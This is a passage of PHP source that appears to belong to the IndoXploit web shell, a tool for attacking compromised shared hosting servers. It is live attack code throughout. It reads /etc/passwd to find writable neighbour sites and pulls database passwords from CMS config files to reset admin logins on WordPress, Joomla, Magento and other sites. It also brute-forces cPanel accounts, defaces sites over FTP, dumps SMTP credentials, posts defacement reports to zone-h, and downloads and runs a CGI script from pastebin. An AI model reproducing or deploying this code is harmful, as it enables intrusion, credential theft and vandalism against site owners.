805. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
806. </form></center>';
807. }
808. } elseif(preg_match("/vhosts|vhost/", $dir)) {
809. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
810. $urls = explode("\r\n", $_POST['url']);
811. if(isset($_POST['jump'])) {
812. echo "<pre>";
813. foreach($urls as $url) {
814. $url = str_replace("www.", "", $url);
815. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
816. if(is_dir($web_vh) === true) {
817. if(is_readable($web_vh)) {
818. $i++;
819. $jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
820. if(is_writable($web_vh)) {
821. $jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
822. }
823. echo $jrw."<br>";
824. }
825. }
826. }
827. if($i == 0) {
828. } else {
829. echo "<br>Total ada ".$i." Kamar di ".$ip;
830. }
831. echo "</pre>";
832. } else {
833. echo '<center>
834. <form method="post">
835. List Domains: <br>
836. <textarea name="url" style="width: 500px; height: 250px;">';
837. bing("ip:$ip");
838. echo '</textarea><br>
839. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
840. </form></center>';
841. }
842. } else {
843. echo "<pre>";
844. $etc = fopen("/etc/passwd", "r") or die("<font color=red>SHIT !! CAN'T READ /ETC/PASSSWD- SHIT HAPPENS BE CLAM</font>");
845. while($passwd = fgets($etc)) {
846. if($passwd == '' || !$etc) {
847. echo "<font color=red>SHIT !! CAN'T READ /ETC/PASSSWD- SHIT HAPPENS BE CLAM</font>";
848. } else {
849. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
850. foreach($user_jumping[1] as $user_idx_jump) {
851. $user_jumping_dir = "/home/$user_idx_jump/public_html";
852. if(is_readable($user_jumping_dir)) {
853. $i++;
854. $jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=green>$user_jumping_dir</font></a>";
855. if(is_writable($user_jumping_dir)) {
856. $jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=green>$user_jumping_dir</font></a>";
857. }
858. echo $jrw;
859. if(function_exists('posix_getpwuid')) {
860. $domain_jump = file_get_contents("/etc/named.conf");
861. if($domain_jump == '') {
862. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
863. } else {
864. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
865. foreach($domains_jump[1] as $dj) {
866. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
867. $user_jumping_url = $user_jumping_url['name'];
868. if($user_jumping_url == $user_idx_jump) {
869. echo " => ( <u>$dj</u> )<br>";
870. break;
871. }
872. }
873. }
874. } else {
875. echo "<br>";
876. }
877. }
878. }
879. }
880. }
881. if($i == 0) {
882. } else {
883. echo "<br>Total ada ".$i." Kamar di ".$ip;
884. }
885. echo "</pre>";
886. }
887. echo "</div>";
888. } elseif($_GET['do'] == 'auto_edit_user') {
889. if($_POST['hajar']) {
890. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
891. echo "username atau password harus lebih dari 6 karakter";
892. } else {
893. $user_baru = $_POST['user_baru'];
894. $pass_baru = md5($_POST['pass_baru']);
895. $conf = $_POST['config_dir'];
896. $scan_conf = scandir($conf);
897. foreach($scan_conf as $file_conf) {
898. if(!is_file("$conf/$file_conf")) continue;
899. $config = file_get_contents("$conf/$file_conf");
900. if(preg_match("/JConfig|joomla/",$config)) {
901. $dbhost = ambilkata($config,"host = '","'");
902. $dbuser = ambilkata($config,"user = '","'");
903. $dbpass = ambilkata($config,"password = '","'");
904. $dbname = ambilkata($config,"db = '","'");
905. $dbprefix = ambilkata($config,"dbprefix = '","'");
906. $prefix = $dbprefix."users";
907. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
908. $db = mysql_select_db($dbname);
909. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
910. $result = mysql_fetch_array($q);
911. $id = $result['id'];
912. $site = ambilkata($config,"sitename = '","'");
913. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
914. echo "Config => ".$file_conf."<br>";
915. echo "CMS => Joomla<br>";
916. if($site == '') {
917. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
918. } else {
919. echo "Sitename => $site<br>";
920. }
921. if(!$update OR !$conn OR !$db) {
922. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
923. } else {
924. echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
925. }
926. mysql_close($conn);
927. } elseif(preg_match("/WordPress/",$config)) {
928. $dbhost = ambilkata($config,"DB_HOST', '","'");
929. $dbuser = ambilkata($config,"DB_USER', '","'");
930. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
931. $dbname = ambilkata($config,"DB_NAME', '","'");
932. $dbprefix = ambilkata($config,"table_prefix = '","'");
933. $prefix = $dbprefix."users";
934. $option = $dbprefix."options";
935. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
936. $db = mysql_select_db($dbname);
937. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
938. $result = mysql_fetch_array($q);
939. $id = $result[ID];
940. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
941. $result2 = mysql_fetch_array($q2);
942. $target = $result2[option_value];
943. if($target == '') {
944. $url_target = "Login => <font color=red>ERROR COULDN'T CONNECT TO MYSQL</font><br>";
945. } else {
946. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
947. }
948. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
949. echo "Config => ".$file_conf."<br>";
950. echo "CMS => Wordpress<br>";
951. echo $url_target;
952. if(!$update OR !$conn OR !$db) {
953. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
954. } else {
955. echo "Status => <font color=green>HI HO4R KOD3 SUCCESSFULLY RESETED WORDPRESS PASSWORD AND USERANME</font><br><br>";
956. }
957. mysql_close($conn);
958. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
959. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
960. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
961. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
962. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
963. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
964. $prefix = $dbprefix."admin_user";
965. $option = $dbprefix."core_config_data";
966. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
967. $db = mysql_select_db($dbname);
968. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
969. $result = mysql_fetch_array($q);
970. $id = $result[user_id];
971. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
972. $result2 = mysql_fetch_array($q2);
973. $target = $result2[value];
974. if($target == '') {
975. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
976. } else {
977. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
978. }
979. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
980. echo "Config => ".$file_conf."<br>";
981. echo "CMS => Magento<br>";
982. echo $url_target;
983. if(!$update OR !$conn OR !$db) {
984. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
985. } else {
986. echo "Status => <font color=red>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
987. }
988. mysql_close($conn);
989. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
990. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
991. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
992. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
993. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
994. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
995. $prefix = $dbprefix."user";
996. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
997. $db = mysql_select_db($dbname);
998. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
999. $result = mysql_fetch_array($q);
1000. $id = $result[user_id];
1001. $target = ambilkata($config,"HTTP_SERVER', '","'");
1002. if($target == '') {
1003. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1004. } else {
1005. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1006. }
1007. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1008. echo "Config => ".$file_conf."<br>";
1009. echo "CMS => OpenCart<br>";
1010. echo $url_target;
1011. if(!$update OR !$conn OR !$db) {
1012. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1013. } else {
1014. echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1015. }
1016. mysql_close($conn);
1017. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1018. $dbhost = ambilkata($config,'server = "','"');
1019. $dbuser = ambilkata($config,'username = "','"');
1020. $dbpass = ambilkata($config,'password = "','"');
1021. $dbname = ambilkata($config,'database = "','"');
1022. $prefix = "users";
1023. $option = "identitas";
1024. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1025. $db = mysql_select_db($dbname);
1026. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1027. $result = mysql_fetch_array($q);
1028. $target = $result[alamat_website];
1029. if($target == '') {
1030. $target2 = $result[url];
1031. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1032. if($target2 == '') {
1033. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1034. } else {
1035. $cek_login3 = file_get_contents("$target2/adminweb/");
1036. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1037. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1038. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1039. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1040. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1041. } else {
1042. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1043. }
1044. }
1045. } else {
1046. $cek_login = file_get_contents("$target/adminweb/");
1047. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1048. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1049. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1050. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1051. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1052. } else {
1053. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1054. }
1055. }
1056. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1057. echo "Config => ".$file_conf."<br>";
1058. echo "CMS => Lokomedia<br>";
1059. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1060. echo $url_target2;
1061. } else {
1062. echo $url_target;
1063. }
1064. if(!$update OR !$conn OR !$db) {
1065. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1066. } else {
1067. echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1068. }
1069. mysql_close($conn);
1070. }
1071. }
1072. }
1073. } else {
1074. echo "<center>
1075. <h1> Wordpress Auto Edit User-Config</h1>
1076. <form method='post'>
1077. DIR Config: <br>
1078. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1079. Set User & Pass: <br>
1080. <input type='text' name='user_baru' value='hoar@123' placeholder='user_baru'><br>
1081. <input type='text' name='pass_baru' value='hoar@123' placeholder='pass_baru'><br>
1082. <input type='submit' name='hajar' value='Submit !' style='width: 215px;'>
1083. </form>
1084. <span>NB: These Tools Work if They Run Inside The Config Folder( EX: /home/user/public_html/nama_folder_config )</span><br>
1085. ";
1086. }
1087. } elseif($_GET['do'] == 'cpanel') {
1088. if($_POST['crack']) {
1089. $usercp = explode("\r\n", $_POST['user_cp']);
1090. $passcp = explode("\r\n", $_POST['pass_cp']);
1091. $i = 0;
1092. foreach($usercp as $ucp) {
1093. foreach($passcp as $pcp) {
1094. if(@mysql_connect('localhost', $ucp, $pcp)) {
1095. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1096. } else {
1097. $_SESSION[$ucp] = "1";
1098. $_SESSION[$pcp] = "1";
1099. if($ucp == '' || $pcp == '') {
1100.  
1101. } else {
1102. $i++;
1103. if(function_exists('posix_getpwuid')) {
1104. $domain_cp = file_get_contents("/etc/named.conf");
1105. if($domain_cp == '') {
1106. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
1107. } else {
1108. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1109. foreach($domains_cp[1] as $dj) {
1110. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1111. $user_cp_url = $user_cp_url['name'];
1112. if($user_cp_url == $ucp) {
1113. $dom = "<a href='http://$dj/' target='_blank'><font color=green>$dj</font></a>";
1114. break;
1115. }
1116. }
1117. }
1118. } else {
1119. $dom = "<font color=red>function is Disable by system</font>";
1120. }
1121. echo "username (<font color=green>$ucp</font>) password (<font color=green>$pcp</font>) domain ($dom)<br>";
1122. }
1123. }
1124. }
1125. }
1126. }
1127. if($i == 0) {
1128. } else {
1129. echo "<br>sukses nyolong ".$i." Cpanel by <font color=green>IndoXploit.</font>";
1130. }
1131. } else {
1132. echo "<center>
1133. <form method='post'>
1134. USER: <br>
1135. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1136. $_usercp = fopen("/etc/passwd","r");
1137. while($getu = fgets($_usercp)) {
1138. if($getu == '' || !$_usercp) {
1139. echo "<font color=red>Can't read /etc/passwd</font>";
1140. } else {
1141. preg_match_all("/(.*?):x:/", $getu, $u);
1142. foreach($u[1] as $user_cp) {
1143. if(is_dir("/home/$user_cp/public_html")) {
1144. echo "$user_cp\n";
1145. }
1146. }
1147. }
1148. }
1149. echo "</textarea><br>
1150. PASS: <br>
1151. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1152. function cp_pass($dir) {
1153. $pass = "";
1154. $dira = scandir($dir);
1155. foreach($dira as $dirb) {
1156. if(!is_file("$dir/$dirb")) continue;
1157. $ambil = file_get_contents("$dir/$dirb");
1158. if(preg_match("/WordPress/", $ambil)) {
1159. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1160. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1161. $pass .= ambilkata($ambil,"password = '","'")."\n";
1162. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1163. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1164. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1165. $pass .= ambilkata($ambil,'password = "','"')."\n";
1166. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1167. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1168. } elseif(preg_match("/^[client]$/", $ambil)) {
1169. preg_match("/password=(.*?)/", $ambil, $pass1);
1170. if(preg_match('/"/', $pass1[1])) {
1171. $pass1[1] = str_replace('"', "", $pass1[1]);
1172. $pass .= $pass1[1]."\n";
1173. } else {
1174. $pass .= $pass1[1]."\n";
1175. }
1176. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1177. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1178. }
1179. }
1180. echo $pass;
1181. }
1182. $cp_pass = cp_pass($dir);
1183. echo $cp_pass;
1184. echo "</textarea><br>
1185. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1186. </form>
1187. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1188. }
1189. } elseif($_GET['do'] == 'cpftp_auto') {
1190. if($_POST['crack']) {
1191. $usercp = explode("\r\n", $_POST['user_cp']);
1192. $passcp = explode("\r\n", $_POST['pass_cp']);
1193. $i = 0;
1194. foreach($usercp as $ucp) {
1195. foreach($passcp as $pcp) {
1196. if(@mysql_connect('localhost', $ucp, $pcp)) {
1197. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1198. } else {
1199. $_SESSION[$ucp] = "1";
1200. $_SESSION[$pcp] = "1";
1201. if($ucp == '' || $pcp == '') {
1202. //
1203. } else {
1204. echo "[+] username (<font color=green>$ucp</font>) password (<font color=green>$pcp</font>)<br>";
1205. $ftp_conn = ftp_connect($ip);
1206. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1207. if((!$ftp_login) || (!$ftp_conn)) {
1208. echo "[+] <font color=red>Login Gagal</font><br><br>";
1209. } else {
1210. echo "[+] <font color=green>Login Sukses</font><br>";
1211. $fi = htmlspecialchars($_POST['file_deface']);
1212. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1213. if($deface) {
1214. $i++;
1215. echo "[+] <font color=green>Deface Sukses</font><br>";
1216. if(function_exists('posix_getpwuid')) {
1217. $domain_cp = file_get_contents("/etc/named.conf");
1218. if($domain_cp == '') {
1219. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1220. } else {
1221. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1222. foreach($domains_cp[1] as $dj) {
1223. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1224. $user_cp_url = $user_cp_url['name'];
1225. if($user_cp_url == $ucp) {
1226. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1227. break;
1228. }
1229. }
1230. }
1231. } else {
1232. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1233. }
1234. } else {
1235. echo "[-] <font color=red>Deface Gagal</font><br><br>";
1236. }
1237. }
1238. //echo "username (<font color=green>$ucp</font>) password (<font color=green>$pcp</font>)<br>";
1239. }
1240. }
1241. }
1242. }
1243. }
1244. if($i == 0) {
1245. } else {
1246. echo "<br>sukses deface ".$i." Cpanel by <font color=green>IndoXploit.</font>";
1247. }
1248. } else {
1249. echo "<center>
1250. <form method='post'>
1251. Filename: <br>
1252. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1253. Deface Page: <br>
1254. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
1255. USER: <br>
1256. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1257. $_usercp = fopen("/etc/passwd","r");
1258. while($getu = fgets($_usercp)) {
1259. if($getu == '' || !$_usercp) {
1260. echo "<font color=red>Can't read /etc/passwd</font>";
1261. } else {
1262. preg_match_all("/(.*?):x:/", $getu, $u);
1263. foreach($u[1] as $user_cp) {
1264. if(is_dir("/home/$user_cp/public_html")) {
1265. echo "$user_cp\n";
1266. }
1267. }
1268. }
1269. }
1270. echo "</textarea><br>
1271. PASS: <br>
1272. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1273. function cp_pass($dir) {
1274. $pass = "";
1275. $dira = scandir($dir);
1276. foreach($dira as $dirb) {
1277. if(!is_file("$dir/$dirb")) continue;
1278. $ambil = file_get_contents("$dir/$dirb");
1279. if(preg_match("/WordPress/", $ambil)) {
1280. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1281. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1282. $pass .= ambilkata($ambil,"password = '","'")."\n";
1283. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1284. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1285. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1286. $pass .= ambilkata($ambil,'password = "','"')."\n";
1287. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1288. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1289. } elseif(preg_match("/client/", $ambil)) {
1290. preg_match("/password=(.*)/", $ambil, $pass1);
1291. if(preg_match('/"/', $pass1[1])) {
1292. $pass1[1] = str_replace('"', "", $pass1[1]);
1293. $pass .= $pass1[1]."\n";
1294. }
1295. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1296. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1297. }
1298. }
1299. echo $pass;
1300. }
1301. $cp_pass = cp_pass($dir);
1302. echo $cp_pass;
1303. echo "</textarea><br>
1304. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1305. </form>
1306. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1307. }
1308. } elseif($_GET['do'] == 'smtp') {
1309. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1310. function scj($dir) {
1311. $dira = scandir($dir);
1312. foreach($dira as $dirb) {
1313. if(!is_file("$dir/$dirb")) continue;
1314. $ambil = file_get_contents("$dir/$dirb");
1315. $ambil = str_replace("$", "", $ambil);
1316. if(preg_match("/JConfig|joomla/", $ambil)) {
1317. $smtp_host = ambilkata($ambil,"smtphost = '","'");
1318. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1319. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1320. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1321. $smtp_port = ambilkata($ambil,"smtpport = '","'");
1322. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1323. echo "SMTP Host: <font color=green>$smtp_host</font><br>";
1324. echo "SMTP port: <font color=green>$smtp_port</font><br>";
1325. echo "SMTP user: <font color=green>$smtp_user</font><br>";
1326. echo "SMTP pass: <font color=green>$smtp_pass</font><br>";
1327. echo "SMTP auth: <font color=green>$smtp_auth</font><br>";
1328. echo "SMTP secure: <font color=green>$smtp_secure</font><br><br>";
1329. }
1330. }
1331. }
1332. $smpt_hunter = scj($dir);
1333. echo $smpt_hunter;
1334. } elseif($_GET['do'] == 'auto_wp') {
1335. if($_POST['hajar']) {
1336. $title = htmlspecialchars($_POST['new_title']);
1337. $pn_title = str_replace(" ", "-", $title);
1338. if($_POST['cek_edit'] == "Y") {
1339. $script = $_POST['edit_content'];
1340. } else {
1341. $script = $title;
1342. }
1343. $conf = $_POST['config_dir'];
1344. $scan_conf = scandir($conf);
1345. foreach($scan_conf as $file_conf) {
1346. if(!is_file("$conf/$file_conf")) continue;
1347. $config = file_get_contents("$conf/$file_conf");
1348. if(preg_match("/WordPress/", $config)) {
1349. $dbhost = ambilkata($config,"DB_HOST', '","'");
1350. $dbuser = ambilkata($config,"DB_USER', '","'");
1351. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1352. $dbname = ambilkata($config,"DB_NAME', '","'");
1353. $dbprefix = ambilkata($config,"table_prefix = '","'");
1354. $prefix = $dbprefix."posts";
1355. $option = $dbprefix."options";
1356. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1357. $db = mysql_select_db($dbname);
1358. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1359. $result = mysql_fetch_array($q);
1360. $id = $result[ID];
1361. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1362. $result2 = mysql_fetch_array($q2);
1363. $target = $result2[option_value];
1364. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1365. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1366. echo "<div style='margin: 5px auto;'>";
1367. if($target == '') {
1368. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1369. } else {
1370. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1371. }
1372. if(!$update OR !$conn OR !$db) {
1373. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1374. } else {
1375. echo "<font color=green>sukses di ganti.</font><br>";
1376. }
1377. echo "</div>";
1378. mysql_close($conn);
1379. }
1380. }
1381. } else {
1382. echo "<center>
1383. <h1>Auto Edit Title+Content WordPress</h1>
1384. <form method='post'>
1385. DIR Config: <br>
1386. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1387. Set Title: <br>
1388. <input type='text' name='new_title' value='HACKED BY HO4R KOD3 from TeaM_CC' placeholder='New Title'><br><br>
1389. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1390. <span>Select Y To Write Content Too Leave N To Write Only Title</span><br>
1391. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1392. <input type='submit' name='hajar' value='Submit !' style='width: 450px;'><br>
1393. </form>
1394. <span>NB: These Tools Work if They Run Inside The Config Folder( EX: /home/user/public_html/nama_folder_config )</span><br>
1395. ";
1396. }
1397. } elseif($_GET['do'] == 'zoneh') {
1398. if($_POST['submit']) {
1399. $domain = explode("\r\n", $_POST['url']);
1400. $nick = $_POST['nick'];
1401. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1402. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1403. function zoneh($url,$nick) {
1404. $ch = curl_init("http://www.zone-h.com/notify/single");
1405. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1406. curl_setopt($ch, CURLOPT_POST, true);
1407. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1408. return curl_exec($ch);
1409. curl_close($ch);
1410. }
1411. foreach($domain as $url) {
1412. $zoneh = zoneh($url,$nick);
1413. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1414. echo "$url -> <font color=green>OK</font><br>";
1415. } else {
1416. echo "$url -> <font color=red>ERROR</font><br>";
1417. }
1418. }
1419. } else {
1420. echo "<center><form method='post'>
1421. <u>Defacer</u>: <br>
1422. <input type='text' name='nick' size='50' value='TeaM_CC'><br>
1423. <u>Domains</u>: <br>
1424. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1425. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1426. </form>";
1427. }
1428. echo "</center>";
1429. } elseif($_GET['do'] == 'cgi') {
1430. $cgi_dir = mkdir('idx_cgi', 0755);
1431. $file_cgi = "idx_cgi/cgi.izo";
1432. $isi_htcgi = "AddHandler cgi-script .izo";
1433. $htcgi = fopen(".htaccess", "w");
1434. fwrite($htcgi, $isi_htcgi);
1435. fclose($htcgi);
1436. $cgi_script = getsource("https://pastebin.com/raw/TtDtCPPT");
1437. $cgi = fopen($file_cgi, "w");
1438. fwrite($cgi, $cgi_script);
1439. fclose($cgi);
1440. chmod($file_cgi, 0755);
1441. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1442. } elseif($_GET['do'] == 'fake_root') {
1443. ob_start();
1444. $cwd = getcwd();
1445. $ambil_user = explode("/", $cwd);
1446. $user = $ambil_user[2];
1447. if($_POST['reverse']) {
1448. $site = explode("\r\n", $_POST['url']);
1449. $file = $_POST['file'];
1450. foreach($site as $url) {
1451. $cek = getsource("$url/~$user/$file");
1452. if(preg_match("/hacked/i", $cek)) {
1453. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=green>Fake Root!</font><br>";
1454. }
1455. }
1456. } else {
1457. echo "<center><form method='post'>
1458. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1459. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1460. Domain: <br>
1461. <textarea style='width: 450px; height: 250px;' name='url'>";
1462. reverse($_SERVER['HTTP_HOST']);
1463. echo "</textarea><br>
1464. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1465. </form><br>
1466. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1467. }
1468. } elseif($_GET['do'] == 'adminer') {
1469. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1470. function adminer($url, $isi) {
1471. $fp = fopen($isi, "w");
1472. $ch = curl_init();
1473. curl_setopt($ch, CURLOPT_URL, $url);
1474. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1475. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1476. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1477. curl_setopt($ch, CURLOPT_FILE, $fp);
1478. return curl_exec($ch);
1479. curl_close($ch);
1480. fclose($fp);
1481. ob_flush();
1482. flush();
1483. }
